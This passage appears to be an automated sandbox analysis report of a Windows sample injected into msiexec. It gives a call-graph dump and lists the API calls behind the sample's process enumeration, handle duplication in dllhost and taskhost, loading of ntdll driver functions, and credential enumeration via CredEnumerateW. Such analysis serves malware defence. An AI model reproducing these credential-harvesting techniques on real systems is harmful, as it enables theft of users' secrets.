438164 40119->40115 40120->40119 40123 437e5e 40120->40123 40146 4300e8 memset memset memcpy 40120->40146 40147 437d3c 40123->40147 40125 437eb3 40125->40120 40126 437ea9 40126->40125 40132 437f22 40126->40132 40162 41f432 40126->40162 40129 437f06 40209 415c56 11 API calls 40129->40209 40130 437f7f 40133 437f95 40130->40133 40136 43802b 40130->40136 40132->40130 40134 432d4e 3 API calls 40132->40134 40210 415c56 11 API calls 40133->40210 40134->40130 40137 4165ff 11 API calls 40136->40137 40138 438054 40137->40138 40173 437371 40138->40173 40141 43806b 40142 438094 40141->40142 40211 42f50e 137 API calls 40141->40211 40144 437fa3 40142->40144 40212 4300e8 memset memset memcpy 40142->40212 40144->40125 40213 41f638 103 API calls 40144->40213 40146->40120 40148 437d69 40147->40148 40151 437d80 40147->40151 40214 437ccb 11 API calls 40148->40214 40150 437d76 40150->40126 40151->40150 40152 437da3 40151->40152 40153 437d90 40151->40153 40155 438460 133 API calls 40152->40155 40153->40150 40218 437ccb 11 API calls 40153->40218 40158 437dcb 40155->40158 40156 437de8 40217 424f26 122 API calls 40156->40217 40158->40156 40215 444283 13 API calls 40158->40215 40160 437dfc 40216 437ccb 11 API calls 40160->40216 40163 41f54d 40162->40163 40169 41f44f 40162->40169 40164 41f466 40163->40164 40248 41c635 memset memset 40163->40248 40164->40129 40164->40132 40169->40164 40171 41f50b 40169->40171 40219 41f1a5 40169->40219 40244 41c06f memcmp 40169->40244 40245 41f3b1 89 API calls 40169->40245 40246 41f398 85 API calls 40169->40246 40171->40163 40171->40164 40247 41c295 85 API calls 40171->40247 40249 41703f 40173->40249 40175 437399 40176 43739d 40175->40176 40178 4373ac 40175->40178 40256 4446ea 11 API calls 40176->40256 40179 416935 16 API calls 40178->40179 40180 4373ca 40179->40180 40182 438460 133 API calls 40180->40182 40186 4251c4 136 API calls 40180->40186 40190 415a91 memset 40180->40190 40193 43758f 40180->40193 40205 437584 40180->40205 40208 437d3c 134 API calls 40180->40208 40257 425433 13 API calls 40180->40257 40258 425413 17 API calls 40180->40258 40259 42533e 16 API calls 40180->40259 40260 42538f 16 API calls 40180->40260 40261 42453e 122 API calls 40180->40261 40181 4375bc 40264 415c7d 16 API calls 40181->40264 40182->40180 40185 4375d2 40207 4373a7 40185->40207 40265 4442e6 11 API calls 40185->40265 40186->40180 40188 4375e2 40188->40207 40266 444283 13 API calls 40188->40266 40190->40180 40262 42453e 122 API calls 40193->40262 40194 4375f4 40199 437620 40194->40199 40200 43760b 40194->40200 40198 43759f 40201 416935 16 API calls 40198->40201 40203 416935 16 API calls 40199->40203 40267 444283 13 API calls 40200->40267 40201->40205 40203->40207 40205->40181 40263 42453e 122 API calls 40205->40263 40206 437612 memcpy 40206->40207 40207->40141 40208->40180 40209->40125 40210->40144 40211->40142 40212->40144 40213->40125 40214->40150 40215->40160 40216->40156 40217->40150 40218->40150 40220 41bc3b 100 API calls 40219->40220 40221 41f1b4 40220->40221 40222 41edad 85 API calls 40221->40222 40229 41f282 40221->40229 40223 41f1cb 40222->40223 40224 41f1f5 memcmp 40223->40224 40225 41f20e 40223->40225 40223->40229 40224->40225 40226 41f21b memcmp 40225->40226 40225->40229 40227 41f326 40226->40227 40230 41f23d 40226->40230 40228 41ee6b 85 API calls 40227->40228 40227->40229 40228->40229 40229->40169 40230->40227 40231 41f28e memcmp 40230->40231 40233 41c8df 55 API calls 40230->40233 40231->40227 40232 41f2a9 40231->40232 40232->40227 40235 41f308 40232->40235 40236 41f2d8 40232->40236 40234 41f269 40233->40234 40234->40227 40237 41f287 40234->40237 40238 41f27a 40234->40238 40235->40227 40242 4446ce 11 API calls 40235->40242 40239 41ee6b 85 API calls 40236->40239 40237->40231 40240 41ee6b 85 API calls 40238->40240 40241 41f2e0 40239->40241 40240->40229 40243 41b1ca memset 40241->40243 40242->40227 40243->40229 40244->40169 40245->40169 40246->40169 40247->40163 40248->40164 40250 417044 40249->40250 40251 41705c 40249->40251 40253 416760 11 API calls 40250->40253 40255 417055 40250->40255 40252 417075 40251->40252 40254 41707a 11 API calls 40251->40254 40252->40175 40253->40255 40254->40250 40255->40175 40256->40207 40257->40180 40258->40180 40259->40180 40260->40180 40261->40180 40262->40198 40263->40181 40264->40185 40265->40188 40266->40194 40267->40206 40273 415cfe 40268->40273 40277 415d23 __aullrem __aulldvrm 40273->40277 40280 41628e 40273->40280 40274 4163ca 40287 416422 11 API calls 40274->40287 40276 416172 memset 40276->40277 40277->40274 40277->40276 40278 416422 10 API calls 40277->40278 40279 415cb9 10 API calls 40277->40279 40277->40280 40278->40277 40279->40277 40281 416520 40280->40281 40282 416527 40281->40282 40286 416574 40281->40286 40284 416544 40282->40284 40282->40286 40288 4156aa 11 API calls 40282->40288 40285 416561 memcpy 40284->40285 40284->40286 40285->40286 40286->40078 40287->40280 40288->40284 40310 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39767 4147f3 39770 414561 39767->39770 39769 414813 39771 41456d 39770->39771 39772 41457f GetPrivateProfileIntW 39770->39772 39775 4143f1 memset _itow WritePrivateProfileStringW 39771->39775 39772->39769 39774 41457a 39774->39769 39775->39774

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                • API String ID: 708747863-3398334509
                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                • memset.MSVCRT ref: 00413E07
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                • free.MSVCRT ref: 00413EC1
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                • API String ID: 1344430650-1740548384
                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                APIs
                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                APIs
                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                • free.MSVCRT ref: 00418803
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                • String ID:
                                                                                • API String ID: 1355100292-0
                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNext
                                                                                • String ID:
                                                                                • API String ID: 1690352074-0
                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041898C
                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                • API String ID: 3558857096-0
                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004455C2
                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 0044570D
                                                                                • memset.MSVCRT ref: 00445725
                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                • memset.MSVCRT ref: 0044573D
                                                                                • memset.MSVCRT ref: 00445755
                                                                                • memset.MSVCRT ref: 004458CB
                                                                                • memset.MSVCRT ref: 004458E3
                                                                                • memset.MSVCRT ref: 0044596E
                                                                                • memset.MSVCRT ref: 00445A10
                                                                                • memset.MSVCRT ref: 00445A28
                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                • memset.MSVCRT ref: 00445B52
                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                • memset.MSVCRT ref: 00445B82
